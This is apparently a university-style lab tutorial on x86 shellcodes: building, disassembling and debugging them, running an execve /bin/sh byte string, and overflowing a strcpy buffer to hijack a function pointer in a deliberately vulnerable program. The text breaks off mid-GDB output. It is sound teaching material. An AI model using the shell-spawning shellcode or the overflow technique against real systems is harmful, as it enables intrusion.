To work this session, first clone/update the repository and navigate to the 07-shellcodes
folder.
Other resources:
When creating an attack vector the attacker would usually aim to run a shellcode. However, due to program specifics and modern attack prevention mechanisms, it is uncommon for an attack to consist of a single step. There is no recipe, and an attacker will combine multiple steps and actions for the attack to be successful.
An attacker will typically employ information leak attacks to extract address and values, would use buffer overflow attacks to overwrite sensible data, inject shellcodes and execute them by modifying the program control flow and others. The way these steps are woven together depends on the vulnerability and the program specifics. The attacker is the one that needs to find the best way to tie these steps together to exploit the vulnerability.
A shellcode is a little piece of binary data that is meant to be executed by a process as part of an attack vector. An attacker would usually place a shellcode in the process memory and aim to execute it to trigger an advantageous effect for the attacker.
While a shellcode would typically result in the attacker gaining a shell process by the means the of the execve system call, this needn't always be the case. Some shellcodes may result in writing data to a socket, scanning the memory, opening/creating a file and many others.
A shellcode is typically written in assembly language and then compiled into binary object code and fed to the vulnerable program. There are three actions an attacker must undertake to run a shellcode in a vulnerable program:
When dealing with shellcodes, we work with binary data and we need to be able to generate that. One example is when we need to write an hexadecimal address such as 0x0804804b
. Shellcodes may also need to be written in a file or be fed directly to the process. Generating (binary) data and writing it is a common process when creating attack vectors, especially when dealing with shellcodes.
In order to generate binary data, one can use any programming language, though it is common to use Bash (shell commands), Python or Perl. Let's write the hexadecimal address 0x0804804b
to standard output using different approaches. The commands to do this are:
$ echo -e '\x4b\x80\x04\x08' K� $ python -c 'print "\x4b\x80\x04\x08"' K� $ perl -e 'print "\x4b\x80\x04\x08"' K�
The binary data is not readable from a console. You can either pipe to a hex dumping command (such as hexdump
or xxd
or od
) or you can dump it to a file:
$ python -c 'print "\x4b\x80\x04\x08"' | od -t x4 0000000 0804804b 0000000a $ perl -e 'print "\x4b\x80\x04\x08"' > dump $ od -t x4 dump 0000000 0804804b 0000004
In the snippets above, the reason for the the 0000000a
string in the output processed from Python is due to the Python print
command explicitly adding a newline character (\n
, 0x0a
in hexadecimal) to the output string.
Python and Perl may also be used to generate a string that repeats a character a number of times. For example, if we wanted to generate 50 A
characters followed by the above address we could issue the commands:
$ python -c 'print "A"*50 + "\x4b\x80\x04\x08"' | xxd 00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000030: 4141 4b80 0408 0a AAK... $ perl -e 'print "A"x50,"\x4b\x80\x04\x08"' | xxd 00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000030: 4141 4b80 0408 AAK...
We've used xxd
to dump hexadecimal data.
.
) when the corresponding byte is a non-printable character (i.e. non-ASCII).
It is usually the case that we have access to the raw (binary) shellcode (that we may have generated) and we want to make sure it does exactly what we want it to do. For that we want to disassemble the binary shellcode.
In the 02-tutorial-binary-shellcode/src/
subfolder in the tasks archive there is a file named shellcode.bin
that is a binary file:
$ xxd shellcode.bin 00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768 h!...horldho, Wh 00000010: 4865 6c6c ba0e 0000 0089 e1bb 0100 0000 Hell............ 00000020: b804 0000 00cd 80
We can see there are some strings part of the file and we want to disassemble it as a raw file. For that we use objdump
with the proper arguments:
$ objdump -D -b binary -m i386 -M intel shellcode.bin shellcode.bin: file format binary Disassembly of section .data: 00000000 <.data>: 0: 68 21 0a 00 00 push 0xa21 5: 68 6f 72 6c 64 push 0x646c726f a: 68 6f 2c 20 57 push 0x57202c6f f: 68 48 65 6c 6c push 0x6c6c6548 14: ba 0e 00 00 00 mov edx,0xe 19: 89 e1 mov ecx,esp 1b: bb 01 00 00 00 mov ebx,0x1 20: b8 04 00 00 00 mov eax,0x4 25: cd 80 int 0x80
The above command does raw disassembling, the arguments meaning:
-D
: disassemble all, not only text/code zones. In our case this means disassemble the whole file.-b binary
: treat the file as not having a specific object/executable format (such as ELF, COFF, Mach-O or PE).-m i386
: the machine code inside the binary file is i386 (x86).-M intel
: when disassembling use Intel assembly syntax, as opposed to the AT&T assembly syntax.
The binary file is indeed a shellcode: a short set of instructions that end in a system call (int 0x80
). This shellcode invokes the number 4 system call, i.e. write
(eax
is 4). It writes to file descriptor 1
(ebx
is 1
) meaning standard output. What is shellcode does is write the Hello, World!\n
string to standard output.
This binary shellcode file was obtained by writing a byte string. The byte string is stored in the shellcode.print
and we can regenerate the raw shellcode file through a command such as:
$ cat shellcode.print \x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80 $ echo -en '\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80' > shellcode-2.bin $ cmp shellcode.bin shellcode-2.bin
As the last command (cmp
) issues no output, we know the shellcode-2.bin
file we generated is identical to the initial file.
Let's practice the generation and investigation of binary shellcodes.
Extract the byte strings from these two shellcodes (1, 2) and generate binary shellcode files. Then disassemble these binary shellcode files and check with the initial links that the assembly code is similar.
Now that we know what a shellcode is, how does it look like and how can we verify it through disassembling, let's test one. In the 03-tutorial-hello-shellcode/
subfolder in the tasks archive we have developed a very small program (vuln.c
) for testing the shellcode.
The vuln.c
program is very simple. What it does is define a shellcode
string and initialize it to our earlier byte string shellcode for printing “Hello, World!”. In main we define a function pointer func_ptr
and initialize it forcefully (through a type cast) to the shellcode
string. Then we call func_ptr
which will result in the execution of the binary code within the shellcode
string.
In order to test it, we will first compile the program using make
$ make cc -m32 -Wall -g -c -o vuln.o vuln.c cc -m32 -zexecstack vuln.o -o vuln
resulting in the generation of the vuln
executable.
Then we will run the vuln
executable:
$ ./vuln Hello, World! Segmentation fault
and see that it really gets to execute the shellcode, since the “Hello, World!” string is printed to standard output. So the testing of the shellcode is successful.
The running of the executable also results in the process being delivered a segment violation signal (SIGSEGV
, resulting in the Segmentation fault
message being printed out), but we'll get to that later.
-zexecstack
option. This option is required to be able to execute code from the data section where the shellcode
string is located. This is a trick from our side to allow the execution of code from commonly non-executable program sections; in modern programs these program sections are usually non-executable and other actions need to bypass these limitations. We will discuss about those in the future sessions.
A shellcode will usually do any sort of action through the use of system calls. In the test above we used the write
system call (i.e. system call number 4
, stored in eax
) to print the “Hello, World!” message. A system call is the most basic way of doing actions by directly accessing the operating system interface (i.e. the system call interface). The programmer stores the system call number in the eax
register and the parameters in the other registers (ebx
, ecx
, edx
, esi
, edi
) and then issue the system call trap through the int 0x80
instruction.
We can check the usage of system calls in a shellcode by disassembling the binary system call file and checking the presence of the int 0x80
trap instruction. The experienced hacker would also check the binary string for the string \xcd\x80
, that is the binary string representation of the int 0x80
trap instruction.
If we want to check the shellcode is being run or debug it, we can use strace
for monitoring system calls. For our above program we can check the calling of the write
system call with strace
$ strace ./vuln execve("./vuln", ["./vuln"], [/* 36 vars */]) = 0 [...] write(1, "Hello, World!\n", 14Hello, World! ) = 14 [...]
strace
is able to show us the correct invocation of the write
system call, with the proper arguments.
Another way of doing runtime investigation is through the use of GDB as shown in the next section.
strace
is very useful for troubleshooting shellcode execution. There may be times when a shellcode appears OK when doing static analysis (i.e. disassembling) but it doesn't work properly. strace
is a quick way to check that the system calls that we expect to happen are done properly (i.e. they use proper arguments).
Thorough dynamic investigation of the shellcode is achieved through the use of GDB. We will start the vuln
executable under GDB and then we will see what happens when func_ptr
gets called.
We will start the program under GDB (with PEDA support), breakpoint at main and check the disassembling of the code:
$ gdb -q ./vuln Reading symbols from ./vuln...done. gdb-peda$ start [----------------------------------registers-----------------------------------] [...] [-------------------------------------code-------------------------------------] 0x80483d6 <main+11>: mov ebp,esp 0x80483d8 <main+13>: push ecx 0x80483d9 <main+14>: sub esp,0x14 => 0x80483dc <main+17>: mov DWORD PTR [ebp-0xc],0x80484c0 0x80483e3 <main+24>: mov eax,DWORD PTR [ebp-0xc] 0x80483e6 <main+27>: call eax 0x80483e8 <main+29>: mov eax,0x0 0x80483ed <main+34>: add esp,0x14 [------------------------------------stack-------------------------------------] [...] [------------------------------------------------------------------------------] Legend: code, data, rodata, value Temporary breakpoint 1, main () at vuln.c:14 14 void (*func_ptr)(void) = (void (*)(void)) shellcode; gdb-peda$
The current mov
instruction and the next one (at addresses main+17
and main+24
) result in eax
being initialized to 0x80484c0
. This is the equivalent of the func_ptr
function pointer being initialized to the address of the shellcode
string, as can be seen in the last part of the GDB output. We'll step two instructions (using the GDB si
command) and check that:
gdb-peda$ si [...] gdb-peda$ si [----------------------------------registers-----------------------------------] EAX: 0x80484c0 --> 0xa2168 ('h!\n') [...] [-------------------------------------code-------------------------------------] 0x80483d9 <main+14>: sub esp,0x14 0x80483dc <main+17>: mov DWORD PTR [ebp-0xc],0x80484c0 0x80483e3 <main+24>: mov eax,DWORD PTR [ebp-0xc] => 0x80483e6 <main+27>: call eax 0x80483e8 <main+29>: mov eax,0x0 0x80483ed <main+34>: add esp,0x14 0x80483f0 <main+37>: pop ecx 0x80483f1 <main+38>: pop ebp [...] [------------------------------------stack-------------------------------------] [...] [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x080483e6 17 func_ptr(); gdb-peda$ p/x &shellcode $1 = 0x80484c0 gdb-peda$
As expected, eax
is now initialized to 0x80484c0
, the address of the shellcode
string, as shown in the last GDB command.
The next instruction issued is call eax
. This means that we will jump and execute code starting from the address in eax
, i.e. the address of the shellcode
string, our shellcode. We will issue multiple step instructions command to see our program go through the shellcode instructions until reaching the system call trap instruction (int 0x80
):
gdb-peda$ si [...] gdb-peda$ si [...] gdb-peda$ si [...] [...] gdb-peda$ si [----------------------------------registers-----------------------------------] EAX: 0x4 EBX: 0x1 ECX: 0xffffd2fc ("Hello, World!\n") EDX: 0xe ESI: 0x0 EDI: 0x0 EBP: 0xffffd328 --> 0x0 ESP: 0xffffd2fc ("Hello, World!\n") EIP: 0x80484e5 --> 0x10080cd EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x80484d9 <shellcode+25>: mov ecx,esp 0x80484db <shellcode+27>: mov ebx,0x1 0x80484e0 <shellcode+32>: mov eax,0x4 => 0x80484e5 <shellcode+37>: int 0x80 0x80484e7 <shellcode+39>: add BYTE PTR [ecx],al 0x80484e9: sbb eax,DWORD PTR [ebx] 0x80484eb: cmp ebp,DWORD PTR [eax] 0x80484ed: add BYTE PTR [eax],al [------------------------------------stack-------------------------------------] [...] [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x080484e5 in shellcode ()
Before executing the system call trap we can see that the registers are filled properly:
eax
is 4
, i.e. the number of the write
system callebx
is 1
, i.e. the file descriptor for standard outputecx
points to the “Hello, World!\n” string located on the stackedx
is 14
(0xe
) the length of the “Hello, World!\n” string
When issuing the next instruction (the system call trap), the write
system call will be invoked, resulting in the printing of the “Hello, World!\n” string.
shellcode
string. At a certain point these instructions are not going to be valid resulting in the delivery of the SIGSEGV
signal and the program terminating its execution.
Up until now we've learned about getting a binary shellcode from a byte string shellcode using Bash, Python or Perl and on disassembling a raw binary shellcode to assembly format to check the shellcode instructions.
But we need to do it the other way around. We construct a shellcode using assembly and then we need to obtain its binary format and then its byte string format. The byte string format is the usual form we are going to use the shellcode in programs (be them C, Python, Perl or other programs).
In the 04-tutorial-gen-hello-shellcode/
subfolder in the tasks archive there is the shellcode.S
file, an assembly file implementing the shellcode printing “Hello, World!\n” that we have used above. We'll use that to create the binary shellcode file and then the byte string shellcode. These steps are similar for any shellcode we would create.
First of all we will use nasm
to assemble the shellcode.S
file in the shellcode.bin
file:
$ nasm -o shellcode.bin shellcode.S
By default, nasm
assembles the given assembly code into raw (also named flat-form) binary data. We can inspect the shellcode.bin
file and disassemble it to check whether we did OK:
$ xxd shellcode.bin 00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768 h!...horldho, Wh 00000010: 4865 6c6c ba0e 0000 0089 e1bb 0100 0000 Hell............ 00000020: b804 0000 00cd 80 ....... $ objdump -D -b binary -m i386 -M intel shellcode.bin shellcode.bin: file format binary Disassembly of section .data: 00000000 <.data>: 0: 68 21 0a 00 00 push 0xa21 5: 68 6f 72 6c 64 push 0x646c726f a: 68 6f 2c 20 57 push 0x57202c6f f: 68 48 65 6c 6c push 0x6c6c6548 14: ba 0e 00 00 00 mov edx,0xe 19: 89 e1 mov ecx,esp 1b: bb 01 00 00 00 mov ebx,0x1 20: b8 04 00 00 00 mov eax,0x4 25: cd 80 int 0x80
As the output of the disassembling is identical to the initial assembly file (shellcode.S
) we know we have the correct binary shellcode.
Now we need to extract the byte string shellcode from the binary shellcode file shellcode.bin
. We could do this by hand, going through each byte printed out by xxd
and building up the string, but we can automate this by using hexdump
and its -e
option for formatting:
$ hexdump -v -e '"\\" 1/1 "x%02x"' shellcode.bin; echo \x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
The hexdump
command, with the given arguments prints each byte with a format such as \xAB
where AB
is the two nibbles hexadecimal representation of the number.
All of the above steps are incorporated in the Makefile
file in the 04-tutorial-gen-hello-shellcode/src/
subfolder. For getting the binary shellcode file, we would issue the command:
$ make nasm -o shellcode.bin shellcode.S
The above command assembles the shellcode.S
file into the shellcode.bin
file.
In order to obtain the byte string file, we would issue the command:
$ make print \x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
resulting in the printing of the shellcode in byte string format.
The byte string shellcode can now be integrated into our code and it can be properly placed for execution inside a vulnerable program.
In the above running of the shellcode the processes ended (crashed) by receiving a SIGSEGV
signal. This happened because the shellcode binary code didn't “end” and the execution of binary code continued beyond the shellcode; when reaching an invalid binary instruction, the program crashes.
In order to avoid that and let the program return from the shellcode or exit gracefully after running the shellcode, we have two options:
ret
instruction, resulting in the program getting back to the caller function (main
);exit
system call at the end of the shellcode
Let's do the first one. A rather simple approach would be to add the ret
instruction at the end of the shellcode. We do that by adding a ret
instruction at the end of the shellcode.S
file in the 04-tutorial-gen-hello-shellcode/
subfolder in the tasks archive:
$ cat shellcode.S BITS 32 push 0x0a21 ; "\n!" push 0x646c726f ; "dlro" push 0x57202c6f ; "W, o" push 0x6c6c6548 ; "lleH" mov edx, 14 ; Message length is 14 bytes. mov ecx, esp ; Stack points to message. mov ebx, 1 ; Print to standard output (fd = 1). mov eax, 4 ; __NR_write int 0x80 ret
In the above listing we can see the addition of the ret
instruction to the shellcode.
We now need to extract the shellcode byte string and replace in the vulnerable program (vuln.c
). We do that by using the Makefile
file in the 04-tutorial-gen-hello-shellcode/
subfolder:
$ make print nasm -o shellcode.bin shellcode.S \x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80\xc3
We now replace the above byte string shellcode in the vuln,c
file in the 03-tutorial-hello-shellcode/
subfolder:
$ cat vuln.c [...] static const char shellcode[] = "\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c" "\x64\x68\x6f\x2c\x20\x57\x68\x48\x65" "\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1" "\xbb\x01\x00\x00\x00\xb8\x04\x00\x00" "\x00\xcd\x80\xc3"; [...]
We now compile the program using the new shellcode byte string
make cc -m32 -Wall -g -c -o vuln.o vuln.c cc -m32 -zexecstack vuln.o -o vul
and run it
$ ./vuln Hello, World! Segmentation fault
Although we expected the program to exit gracefully it still gets a SIGSEGV
signal. We use dmesg
to find out the faulty address:
$ dmesg | tail -1 [20349.560852] vuln[12204]: segfault at 6c6c6548 ip 000000006c6c6548 sp 00000000ff948540 error 14
We can see that the instruction pointer (ip
) points to the address 0x6c6c6548
. This address is a string, we can see that by printing the byte string:
$ echo -e '\x6c\x6c\x65\x48' lleH
The above message is part of the Hello, World!\n
message that we want to print. We assume that the stack stores additional data (such as our message) causing the ret
instruction not to work properly.
We do a GDB investigation for additional info and see what happens when the ret
instruction is executed within the shellcode:
$ gdb -q ./vuln Reading symbols from ./vuln...done. gdb-peda$ start [...] gdb-peda$ si Hello, World! [----------------------------------registers-----------------------------------] EAX: 0xe EBX: 0x1 ECX: 0xffffd2fc ("Hello, World!\n") EDX: 0xe ESI: 0x0 EDI: 0x0 EBP: 0xffffd328 --> 0x0 ESP: 0xffffd2fc ("Hello, World!\n") EIP: 0x80484e7 --> 0xc3 EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x80484db <shellcode+27>: mov ebx,0x1 0x80484e0 <shellcode+32>: mov eax,0x4 0x80484e5 <shellcode+37>: int 0x80 => 0x80484e7 <shellcode+39>: ret 0x80484e8 <shellcode+40>: add BYTE PTR [eax],al 0x80484ea: add BYTE PTR [eax],al 0x80484ec: add DWORD PTR [ebx],ebx 0x80484ee: add edi,DWORD PTR [ebx] [------------------------------------stack-------------------------------------] 0000| 0xffffd2fc ("Hello, World!\n") 0004| 0xffffd300 ("o, World!\n") 0008| 0xffffd304 ("orld!\n") 0012| 0xffffd308 --> 0xa21 ('!\n') 0016| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0) 0020| 0xffffd310 --> 0x1 0024| 0xffffd314 --> 0xffffd3d4 --> 0xffffd533 ("/home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/hello-shellcode/vuln") 0028| 0xffffd318 --> 0xffffd3dc --> 0xffffd591 ("XDG_VTNR=7") [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x080484e7 in shellcode () gdb-peda$ si [----------------------------------registers-----------------------------------] EAX: 0xe EBX: 0x1 ECX: 0xffffd2fc ("Hello, World!\n") EDX: 0xe ESI: 0x0 EDI: 0x0 EBP: 0xffffd328 --> 0x0 ESP: 0xffffd300 ("o, World!\n") EIP: 0x6c6c6548 ('Hell') EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x6c6c6548 [------------------------------------stack-------------------------------------] 0000| 0xffffd300 ("o, World!\n") 0004| 0xffffd304 ("orld!\n") 0008| 0xffffd308 --> 0xa21 ('!\n') 0012| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0) 0016| 0xffffd310 --> 0x1 0020| 0xffffd314 --> 0xffffd3d4 --> 0xffffd533 ("/home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/hello-shellcode/vuln") 0024| 0xffffd318 --> 0xffffd3dc --> 0xffffd591 ("XDG_VTNR=7") 0028| 0xffffd31c --> 0x80484c0 --> 0xa2168 ('h!\n') [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x6c6c6548 in ?? () gdb-peda$
When executing the ret
instruction we see that the instruction pointer points to the 0x6c6c6548
address that's actually the string Hell
. If we investigate the stack before and after executing the ret
instruction we find that the Hell
string at the top of the stack (address 0xffffd2fc
) was popped into the instruction pointer (as expected from a ret
instruction). Before executing ret
the stack pointer (esp
) was 0xffffd2fc
and pointed to the Hello, World!\n
string; after executing ret
the first four bytes from the stack (32 bits) were popped from the stack and placed into the instruction pointer (eip
) and the stack pointer is incremented; that means eip
now stores the Hell
string and esp
is 0xfffd300
and points to the rest of the string o, World!\n
.
Our goal is to properly set the stack pointer before executing ret
to make a successful return to the main
function.
In order for ret
to work properly, at the time the ret
instruction is executed the stack pointer needs to be identical to the value when the shellcode was executed. That is, we need to increment the stack pointer (esp
) to point to that value. In the above GDB output, the value is 0xffffd30c
and points to the return address in main
, exactly what we want:
0016| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0)
Update the shellcode to increment the stack pointer (esp
) to the proper value right before issuing the ret
call. This will mean a graceful return from the shellcode in the main
function. If properly done, there would be no SIGSEGV being delivered to the program.
esp
at the beginning of the running of the shellcode and before doing ret
. You need to add the required value to esp
right before the ret
instruction in order for the stack to be on the same state it was at the beginning of the shellcode.
esp
. Due to ASLR (Address Space Layout Randomization) being enabled, the top of the stack will be different each time is run. Use the add
instruction to update the esp
value and discard the string that was stored on the stack inside the shellcode.
shellcode.S
assembly and then obtain the shellcode byte string and update vuln.c
and then compile it and run it.
si
to go through each instruction in the shellcode and check the stack pointer (esp
), the instruction pointer (eip
) and other registers and the stack contents.
Apart from using the ret
instruction to return properly from the shellcode, we can also invoke the exit
system call in the shellcode and terminate the program (gracefully).
Add an equivalent exit(0)
system call in the shellcode using assembly language.
exit
system call number is 1
. You may check the /usr/include/asm/unistd_32.h
for confirmation.
The system call number is placed in the eax
register while the first argument is placed in the ebx
register.
Up until now the string we used for printing inside the shellcode is “Hello, World!\n”. Let's change this to “Hello, Romania!\n”. For this you will have to update the shellcode.S
assembly file and then obtain the byte string shellcode and place it into the vuln.c
file.
Do that and check the program now prints the “Hello, Romania!\n” string to standard output. Update the shellcode that encodes exit(0)
in order for the shellcode to exit gracefully.
-e
formatting option for hexdump
. For example, if trying to create the assembly code for placing the “Hello, World!\n” string on the stack one would issue the comand$ echo -en 'Hello, World!\n' | hexdump -v -e '1/4 "push 0x%08x\n"' | tac push 0x00000a21 push 0x646c726f push 0x57202c6f push 0x6c6c6548
Adapt the above command, get the assembly code for placing “Hello, Romania!\n” on the stack and the update the shellcode, obtain the byte string, place in into the vuln.c
file, compile the file, run the executable and … profit!
As the name implies, a shellcode is usually used for getting a shell. This type of shellcode typically ends in the execve
shellcode. Let's try this using the shellcode from here. We've already made sure that the byte string is valid and ends up invoking the 0xb
(number 11
) system call (i.e. execve
).
We update the shellcode
variabile vuln.c
using this byte string shellcode:
$ cat vuln.c [...] static const char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68" "\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89" "\xe1\xb0\x0b\xcd\x80"; [...]
Now we compile the vuln.c
program
$ make cc -m32 -Wall -g -c -o vuln.o vuln.c cc -m32 -zexecstack vuln.o -o vuln
and then we run it
$ ./vuln $
We can exit the new shell by running exit
or by using the Ctrl+d
keyboard combo.
After running the executable you get a new shell so our shellcode was successful. We can see that by running the executable under strace
and looking for the execve
call:
$ strace ./vuln [...] execve("/bin//sh", ["/bin//sh"], [/* 1 var */]) = 0 [...]
The shellcode was successful and we managed to obtain a new shell.
In the 05-tutorial-bad-execve-shellcode/
in the lab archive you can find of version of the vuln.c
program that uses the execve-based shellcode from above. Except there are some random integer operations in there. If you compile and run the program you get a Segmentation fault error:
$ make cc -m32 -Wall -g -c -o vuln.o vuln.c cc -m32 -zexecstack vuln.o -o vuln $ ./vuln Segmentation fault
The cause of the error is a problem with the shellcode. The shellcode works on certain setups but not all of them due to a negligence of the shellcode author.
execve
system call.
You can use strace
to see the parameters of the execve
system call when running ./vuln
. That will offer you a hint on why the execve
system call has failed.
Disassemble the shellcode, find out the problem with it and reconstruct it and fix it inside the vuln.c
executable so that you will eventually get a shellcode.
In the vuln.c
program we used so far, we initialize the func_ptr
function pointer with the “suitable” shellcode address. This is the triggering phase for the shellcode-based attack but that's far from common in programs. What is usually the case is that a buffer is overflowed to overwrite a suitable address.
In the 06-tutorial-overflow-and-shellcode/
task there is a vuln.c
source code file. In the file we use strcpy()
to copy the first program argument (argv[1]
) in a local buffer variable named buffer
. If we give a string longer than the buffer length (32
) we would do a buffer overflow and be able to overwrite the func_ptr
function pointer located just above the buffer. The vuln.c
file is using a proper NUL-free, always-works shellcode that spawns a shell.
Our goal is to provide the proper command line argument in order to overflow the buffer
variable and overwrite the func_ptr
function pointer with the address of the shellcode
variable storing the byte string shellcode.
First of all let's see how the program behaves:
$ make cc -m32 -Wall -fno-stack-protector -g -c -o vuln.o vuln.c cc -m32 -zexecstack vuln.o -o vuln cc -m32 -zexecstack vuln.o -o vuln $ ./vuln Usage: ./vuln string $ ./vuln aaa Do nothing, successfully!
For a short string the program performs OK and the do_nothing_successfully
function stored in the func_ptr
local variable is invoked.
-fno-stack-protector
option to disable the stack protection mechanism (also dubbed stack canary). We'll discuss more on that in the next sessions.
Let's now see what happens if we overflow the buffer. We write a lot more bytes than the buffer length (let's say 50
bytes) and we check what happens. In order to generate 50 bytes we use perl
:
$ perl -e 'print "A"x50' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
In order to feed that input as a program argument to vuln
we use shell command substitution:
$ ./vuln $(perl -e 'print "A"x50') Segmentation fault
We see that now the program is sent a SIGSEGV
signal. Most probably this is due to the func_ptr
function pointer being overwritten. We check that using dmesg
:
$ dmesg [...] [38217.667318] vuln[11474]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9475ec error 14
As shown in the dmesg
output the program failed when eip
is 0x41414141
(which is the AAAA
string) meaning the func_ptr
local variable was overwritten.
We can also check that using GDB:
$ gdb -q ./vuln Reading symbols from ./vuln...done. gdb-peda$ set args $(perl -e 'print "A"x50') gdb-peda$ start [...] gdb-peda$ disass Dump of assembler code for function main: [...[ 0x08048517 <+84>: push eax 0x08048518 <+85>: call 0x8048350 <strcpy@plt> 0x0804851d <+90>: add esp,0x10 [...] gdb-peda$ b *0x08048518 Breakpoint 2 at 0x8048518: file vuln.c, line 22. gdb-peda$ b *0x0804851d Breakpoint 3 at 0x804851d: file vuln.c, line 22. gdb-peda$ continue Continuing. [----------------------------------registers-----------------------------------] EAX: 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3) EBX: 0xf7f9d000 --> 0x1a5da8 ECX: 0xffffd2f0 --> 0x2 EDX: 0xffffd314 --> 0xf7f9d000 --> 0x1a5da8 ESI: 0x0 EDI: 0x0 EBP: 0xffffd2d8 --> 0x0 ESP: 0xffffd290 --> 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3) EIP: 0x8048518 (<main+85>: call 0x8048350 <strcpy@plt>) EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048513 <main+80>: push eax 0x8048514 <main+81>: lea eax,[ebp-0x2c] 0x8048517 <main+84>: push eax => 0x8048518 <main+85>: call 0x8048350 <strcpy@plt> 0x804851d <main+90>: add esp,0x10 0x8048520 <main+93>: mov eax,DWORD PTR [ebp-0xc] 0x8048523 <main+96>: call eax 0x8048525 <main+98>: mov eax,0x0 Guessed arguments: arg[0]: 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3) arg[1]: 0xffffd550 ('A' <repeats 50 times>) [------------------------------------stack-------------------------------------] 0000| 0xffffd290 --> 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3) 0004| 0xffffd294 --> 0xffffd550 ('A' <repeats 50 times>) 0008| 0xffffd298 --> 0xf7e03bf8 --> 0x2aa0 0012| 0xffffd29c --> 0xf7e281e3 (add ebx,0x174e1d) 0016| 0xffffd2a0 --> 0x0 0020| 0xffffd2a4 --> 0xca0000 0024| 0xffffd2a8 --> 0x1 0028| 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 2, 0x08048518 in main (argc=0x2, argv=0xffffd384) at vuln.c:22 22 strcpy(buffer, argv[1]); gdb-peda$ x/32b buffer 0xffffd2ac: 0x21 0x83 0x04 0x08 0xeb 0xd4 0xff 0xff 0xffffd2b4: 0x2f 0x00 0x00 0x00 0x14 0x98 0x04 0x08 0xffffd2bc: 0x92 0x85 0x04 0x08 0x02 0x00 0x00 0x00 0xffffd2c4: 0x84 0xd3 0xff 0xff 0x90 0xd3 0xff 0xff gdb-peda$ continue Continuing. [----------------------------------registers-----------------------------------] EAX: 0xffffd2ac ('A' <repeats 50 times>) EBX: 0xf7f9d000 --> 0x1a5da8 ECX: 0xffffd580 --> 0x58004141 ('AA') EDX: 0xffffd2dc --> 0xf7004141 ESI: 0x0 EDI: 0x0 EBP: 0xffffd2d8 ("AAAAAA") ESP: 0xffffd290 --> 0xffffd2ac ('A' <repeats 50 times>) EIP: 0x804851d (<main+90>: add esp,0x10) EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048514 <main+81>: lea eax,[ebp-0x2c] 0x8048517 <main+84>: push eax 0x8048518 <main+85>: call 0x8048350 <strcpy@plt> => 0x804851d <main+90>: add esp,0x10 0x8048520 <main+93>: mov eax,DWORD PTR [ebp-0xc] 0x8048523 <main+96>: call eax 0x8048525 <main+98>: mov eax,0x0 0x804852a <main+103>: mov ecx,DWORD PTR [ebp-0x4] [------------------------------------stack-------------------------------------] 0000| 0xffffd290 --> 0xffffd2ac ('A' <repeats 50 times>) 0004| 0xffffd294 --> 0xffffd550 ('A' <repeats 50 times>) 0008| 0xffffd298 --> 0xf7e03bf8 --> 0x2aa0 0012| 0xffffd29c --> 0xf7e281e3 (add ebx,0x174e1d) 0016| 0xffffd2a0 --> 0x0 0020| 0xffffd2a4 --> 0xca0000 0024| 0xffffd2a8 --> 